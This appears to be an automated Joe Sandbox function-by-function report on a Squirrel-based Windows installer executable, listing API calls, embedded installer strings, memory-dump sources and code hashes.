                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 8b11daa9f90c9e37e68644d1393a52f3b62c5303ea25dffce31a2ad35099c99c
                                                                    • Instruction ID: 91f9113587d2838bc74e490d620bb7fbfb56aee6ede8db973168a721e6b64953
                                                                    • Opcode Fuzzy Hash: 8b11daa9f90c9e37e68644d1393a52f3b62c5303ea25dffce31a2ad35099c99c
                                                                    • Instruction Fuzzy Hash: 20A001D62BD222BD352AB6A17D06E3A025DE5D9F617B1892AF80285885A8801DA91436
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: affbb9f147b6049a70608068ec2ebc21b961e5d790a2e27eebc8ad0e0ec97e02
                                                                    • Instruction ID: 91f9113587d2838bc74e490d620bb7fbfb56aee6ede8db973168a721e6b64953
                                                                    • Opcode Fuzzy Hash: affbb9f147b6049a70608068ec2ebc21b961e5d790a2e27eebc8ad0e0ec97e02
                                                                    • Instruction Fuzzy Hash: 20A001D62BD222BD352AB6A17D06E3A025DE5D9F617B1892AF80285885A8801DA91436
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: adedffd656ab554e4374bc1a4758e47a7729855f6c6ceffcc3c4383e881b84c5
                                                                    • Instruction ID: 91f9113587d2838bc74e490d620bb7fbfb56aee6ede8db973168a721e6b64953
                                                                    • Opcode Fuzzy Hash: adedffd656ab554e4374bc1a4758e47a7729855f6c6ceffcc3c4383e881b84c5
                                                                    • Instruction Fuzzy Hash: 20A001D62BD222BD352AB6A17D06E3A025DE5D9F617B1892AF80285885A8801DA91436
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229D62
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: af6f3d0134eace4e48be165ea49ccd609f6b89a496329a4a0aa7ae8813bfc1e9
                                                                    • Instruction ID: 95feb7895b71a7cc47be03b292bb028c1a6d22d0972d58b8851d31ccb8110057
                                                                    • Opcode Fuzzy Hash: af6f3d0134eace4e48be165ea49ccd609f6b89a496329a4a0aa7ae8813bfc1e9
                                                                    • Instruction Fuzzy Hash: 75A011822B8222BC3228BAA03E02E3A020CC0C2F20330880AF80280882A88008A82032
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229D62
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 69b380e912bdfd03903c459bca29e3673b4dc849cb2ae4a96f4249ae2a086a70
                                                                    • Instruction ID: 95feb7895b71a7cc47be03b292bb028c1a6d22d0972d58b8851d31ccb8110057
                                                                    • Opcode Fuzzy Hash: 69b380e912bdfd03903c459bca29e3673b4dc849cb2ae4a96f4249ae2a086a70
                                                                    • Instruction Fuzzy Hash: 75A011822B8222BC3228BAA03E02E3A020CC0C2F20330880AF80280882A88008A82032
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229D62
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: e0c595537bb59da188e83d34aeadfb6be3b50c555a022c7b95508cfac1463621
                                                                    • Instruction ID: 95feb7895b71a7cc47be03b292bb028c1a6d22d0972d58b8851d31ccb8110057
                                                                    • Opcode Fuzzy Hash: e0c595537bb59da188e83d34aeadfb6be3b50c555a022c7b95508cfac1463621
                                                                    • Instruction Fuzzy Hash: 75A011822B8222BC3228BAA03E02E3A020CC0C2F20330880AF80280882A88008A82032
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • FindResourceW.KERNEL32(00000000,00000084,FLAGS), ref: 0022106D
                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 00221075
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoad
                                                                    • String ID: FLAGS$net451$net452$net46$net461$net462$net47$net471$net472$net48
                                                                    • API String ID: 2619053042-95551373
                                                                    • Opcode ID: 8eaf369a497ecece7456ef7615fce3794c86b6c4eae3f1a529759a40a4d0d84c
                                                                    • Instruction ID: 54d9c3a94872f9628e443ed61ea8641725c5628ee5e76cc5b1800d44d47c6c68
                                                                    • Opcode Fuzzy Hash: 8eaf369a497ecece7456ef7615fce3794c86b6c4eae3f1a529759a40a4d0d84c
                                                                    • Instruction Fuzzy Hash: 51217420A70235B5D725EBE4FD53FBD76749F71B44F000066FD06A50C5EBB09AB58941
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 002249CC: SetFilePointer.KERNEL32(?,?,00000000,?), ref: 002249FF
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104), ref: 002258E1
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00225917
                                                                    • _wcsstr.LIBVCRUNTIME ref: 0022592D
                                                                    • _wcsstr.LIBVCRUNTIME ref: 0022593E
                                                                    • _wcsstr.LIBVCRUNTIME ref: 0022594F
                                                                    • SystemTimeToFileTime.KERNEL32(?,00000001), ref: 00225ACF
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00225AFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: FileTime_wcsstr$ByteCharLocalMultiPointerSystemWide
                                                                    • String ID: /../$/..\$\../$\..\
                                                                    • API String ID: 2500941349-3885502717
                                                                    • Opcode ID: ccfb54aac593e09cf2c4910bbe94b13801a3316f1b0d71e545bd7994ea2e000c
                                                                    • Instruction ID: cccfb67eccd489e70cdd3b447fda1a6cecf21413275ff0ff743e9f6036d71be5
                                                                    • Opcode Fuzzy Hash: ccfb54aac593e09cf2c4910bbe94b13801a3316f1b0d71e545bd7994ea2e000c
                                                                    • Instruction Fuzzy Hash: 67F14A71528B619FD724CF64D4803A6BBE0EF85310F148A3EE8A9CB292D774D951CF92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0022A50E,0023F38C,00000017), ref: 0022A3F4
                                                                    • UnhandledExceptionFilter.KERNEL32(0023F38C,?,0022A50E,0023F38C,00000017), ref: 0022A3FD
                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,0022A50E,0023F38C,00000017), ref: 0022A408
                                                                    • TerminateProcess.KERNEL32(00000000,?,0022A50E,0023F38C,00000017), ref: 0022A40F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                    • String ID:
                                                                    • API String ID: 3231755760-0
                                                                    • Opcode ID: 112fe3665ae4b44b7b313a791eae05bf219df623a7df8ffc44dcca58fe7eaf7f
                                                                    • Instruction ID: dd56fe1d628fb9a360f7a0a04bc752680b19c1cafba83f26f6f0e997c71bd08b
                                                                    • Opcode Fuzzy Hash: 112fe3665ae4b44b7b313a791eae05bf219df623a7df8ffc44dcca58fe7eaf7f
                                                                    • Instruction Fuzzy Hash: 47D01235810504ABC7842BE8FF0CE483F28EB14A52F008020F70B81036EB3144008B51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4j$$4j$$4j$$4j$
                                                                    • API String ID: 0-9538948
                                                                    • Opcode ID: 7a305fccb4f8ff2fa544fbe02267f4fbaa4b2ef3f0021de223a00c2f5989f049
                                                                    • Instruction ID: dbfa728649b1735cb6ee3b808deebe7e2c53e7815bae90200e1887d4b5ae9d67
                                                                    • Opcode Fuzzy Hash: 7a305fccb4f8ff2fa544fbe02267f4fbaa4b2ef3f0021de223a00c2f5989f049
                                                                    • Instruction Fuzzy Hash: D262D7B1A1021AEFCF08CF99D9946ADBBF1FB48310F248169D815EB245D778DA61CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00221BDC: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,0022100A), ref: 00221BE2
                                                                      • Part of subcall function 00221BDC: GetLastError.KERNEL32(?,00000000,00000000,?,0022100A), ref: 00221BEC
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00221037), ref: 0022A332
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00221037), ref: 0022A341
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0022A33C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 3511171328-631824599
                                                                    • Opcode ID: 682e8c45fd5035fc9b22a74cde587b20f7beba8c592c1bc9476cdc25e8f1609f
                                                                    • Instruction ID: 70fc4ba8cc7b754bffce040008e53293f647eef2bb8f99e62bf74b1249ff0b07
                                                                    • Opcode Fuzzy Hash: 682e8c45fd5035fc9b22a74cde587b20f7beba8c592c1bc9476cdc25e8f1609f
                                                                    • Instruction Fuzzy Hash: FDE092B0620361DFD370DFA9F948742BBE4AF04704F00896EE886C2A51EBB1D454CF62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0022DFCC
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0022DFD6
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0022DFE3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: 17c2f6bc87714b32215f4aa2874540c6a88caafd999edebe90d6ed5be55e521e
                                                                    • Instruction ID: d615f6f3dd1f7a885452db1cf3ad353713f9805146466340e139b19f57543079
                                                                    • Opcode Fuzzy Hash: 17c2f6bc87714b32215f4aa2874540c6a88caafd999edebe90d6ed5be55e521e
                                                                    • Instruction Fuzzy Hash: E931F57491122CABCB21DF68ED88B8DB7B8BF08310F5045EAE41CA7251EB709B958F44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID:
                                                                    • API String ID: 4168288129-0
                                                                    • Opcode ID: 3988972555a3914d4f552b78c153b26e9f772ea77f83d2b8f6d8b7ee294d7ccb
                                                                    • Instruction ID: 6564ac8b252b35d000327f41438a688e87d1ad2fbc0cb8938ef5915ccef3c9da
                                                                    • Opcode Fuzzy Hash: 3988972555a3914d4f552b78c153b26e9f772ea77f83d2b8f6d8b7ee294d7ccb
                                                                    • Instruction Fuzzy Hash: B1B24FB1E246298FDB25CF28DD407E9B3B9EB45305F1441EAE84DE7240EB74AE918F41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Pi$
                                                                    • API String ID: 0-465683357
                                                                    • Opcode ID: 7cd034ef39ec13c9faba5c902957bb3e55b9d9bdc548bca88db9b37e897b887c
                                                                    • Instruction ID: 266b4be816da2cb5f9c0bb63a67e8fd179e82eae9282118bcb537647f4e80988
                                                                    • Opcode Fuzzy Hash: 7cd034ef39ec13c9faba5c902957bb3e55b9d9bdc548bca88db9b37e897b887c
                                                                    • Instruction Fuzzy Hash: 92B144B1620B51DFD334DF19D880A22B7F5FF4A314B208A5ED4AA8B691D731E816CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(0022AFC7,0022A9D3), ref: 0022AFC0
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 60f563e9c6eb23d13b247d2fab119a662be281cd217a29a7f40e4044dba7f2dd
                                                                    • Instruction ID: 6049d46bc194ac4079a21f0a10189e12009db9210b0078724fcf89a814bac283
                                                                    • Opcode Fuzzy Hash: 60f563e9c6eb23d13b247d2fab119a662be281cd217a29a7f40e4044dba7f2dd
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 3a8723126d6e11ca63e76d2f99a1aa103bed96938cdf1ca3b944493a57602056
                                                                    • Instruction ID: 63e0f51636bcc39a53f8c0ff52d9c8edc3bc15110a83a114a609035ff103efef
                                                                    • Opcode Fuzzy Hash: 3a8723126d6e11ca63e76d2f99a1aa103bed96938cdf1ca3b944493a57602056
                                                                    • Instruction Fuzzy Hash: 63A00174A01209CBD7819F36BA0D2093AE9BA4A6D57468269A459C9260EB2484549A01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32 ref: 002267C7
                                                                    • GetTempFileNameW.KERNEL32(?,Squirrel,?,?), ref: 002267EB
                                                                    • DeleteFileW.KERNEL32(?,?,Squirrel,?,?), ref: 00226800
                                                                    • PathIsUNCW.SHLWAPI(?,?,Squirrel,?,?), ref: 00226807
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00226852
                                                                    • GetLastError.KERNEL32 ref: 00226860
                                                                    • FindResourceW.KERNEL32(00000083,DATA), ref: 00226A03
                                                                    • LoadResource.KERNEL32(00000000), ref: 00226A20
                                                                    • SizeofResource.KERNEL32(00000000), ref: 00226A44
                                                                    • LockResource.KERNEL32(00000000), ref: 00226A59
                                                                    • DeleteFileW.KERNEL32(?), ref: 00226B25
                                                                    • FreeResource.KERNEL32(00000000), ref: 00226BE0
                                                                    • FreeResource.KERNEL32(?,Failed to extract installer), ref: 00226DF2
                                                                    Strings
                                                                    • Failed to extract installer, xrefs: 00226D69
                                                                    • DATA, xrefs: 002269F3
                                                                    • D, xrefs: 00226C2F
                                                                    • %s\%s, xrefs: 00226B10, 00226C06
                                                                    • %s\SquirrelSetup.log, xrefs: 002269E5
                                                                    • "%s" --install . %s, xrefs: 00226C7C
                                                                    • Unable to write to %s - IT policies may be restricting access to this folder, xrefs: 00226878
                                                                    • \SquirrelTemp, xrefs: 00226831
                                                                    • Update.exe, xrefs: 00226BE6
                                                                    • Squirrel, xrefs: 002267E5
                                                                    • There was an error while installing the application. Check the setup log for more information and contact the author., xrefs: 00226CF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$File$DeleteFree$AttributesCreateDirectoryErrorFindLastLoadLockNamePathSizeofTemp
                                                                    • String ID: "%s" --install . %s$%s\%s$%s\SquirrelSetup.log$D$DATA$Failed to extract installer$Squirrel$There was an error while installing the application. Check the setup log for more information and contact the author.$Unable to write to %s - IT policies may be restricting access to this folder$Update.exe$\SquirrelTemp
                                                                    • API String ID: 529842104-1023859308
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 002212F6
                                                                    • GetTempPathW.KERNEL32(00000104,?,-00000068), ref: 0022149F
                                                                    • GetTempFileNameW.KERNEL32(?,NDP,00000000,?), ref: 002214D6
                                                                    • _wcsrchr.LIBVCRUNTIME ref: 00221517
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0022154F
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002216AB
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 002216BE
                                                                    • CloseHandle.KERNEL32(?), ref: 00221721
                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00221738
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: File$Temp$CloseCodeDeleteExitH_prolog3_HandleMoveNameObjectPathProcessSingleWait_wcsrchr
                                                                    • String ID: .exe$/passive /norestart /showrmui$/q /norestart$<$@$Cancel$Downloading$Downloading the .NET Framework installer$NDP$open$pL$
                                                                    • API String ID: 1126903545-3212488926
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 00237093
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236BD3
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236BE5
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236BF7
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C09
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C1B
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C2D
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C3F
                                                                      • Part of subcall function 00236BB6: _free.LIBCMT ref: 00236C51
